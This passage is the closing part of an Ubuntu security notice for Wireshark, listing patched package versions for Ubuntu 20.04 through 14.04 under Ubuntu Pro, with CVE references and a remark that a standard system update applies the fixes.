   tshark                          3.2.3-1ubuntu0.1~esm1  
   wireshark                       3.2.3-1ubuntu0.1~esm1  
   wireshark-common                3.2.3-1ubuntu0.1~esm1  
   wireshark-gtk                   3.2.3-1ubuntu0.1~esm1  
   wireshark-qt                    3.2.3-1ubuntu0.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libwireshark11                  2.6.10-1~ubuntu18.04.0+esm1  
   tshark                          2.6.10-1~ubuntu18.04.0+esm1  
   wireshark                       2.6.10-1~ubuntu18.04.0+esm1  
   wireshark-common                2.6.10-1~ubuntu18.04.0+esm1  
   wireshark-gtk                   2.6.10-1~ubuntu18.04.0+esm1  
   wireshark-qt                    2.6.10-1~ubuntu18.04.0+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libwireshark11                  2.6.10-1~ubuntu16.04.0+esm1  
   tshark                          2.6.10-1~ubuntu16.04.0+esm1  
   wireshark                       2.6.10-1~ubuntu16.04.0+esm1  
   wireshark-common                2.6.10-1~ubuntu16.04.0+esm1  
   wireshark-gtk                   2.6.10-1~ubuntu16.04.0+esm1  
   wireshark-qt                    2.6.10-1~ubuntu16.04.0+esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   libwireshark11                  2.6.10-1~ubuntu14.04.0~esm2  
   tshark                          2.6.10-1~ubuntu14.04.0~esm2  
   wireshark                       2.6.10-1~ubuntu14.04.0~esm2  
   wireshark-common                2.6.10-1~ubuntu14.04.0~esm2  
   wireshark-gtk                   2.6.10-1~ubuntu14.04.0~esm2  
   wireshark-qt                    2.6.10-1~ubuntu14.04.0~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6262-1  
   CVE-2020-13164, CVE-2020-15466, CVE-2020-17498, CVE-2020-25862,  
   CVE-2020-25863

Tag

#ubuntu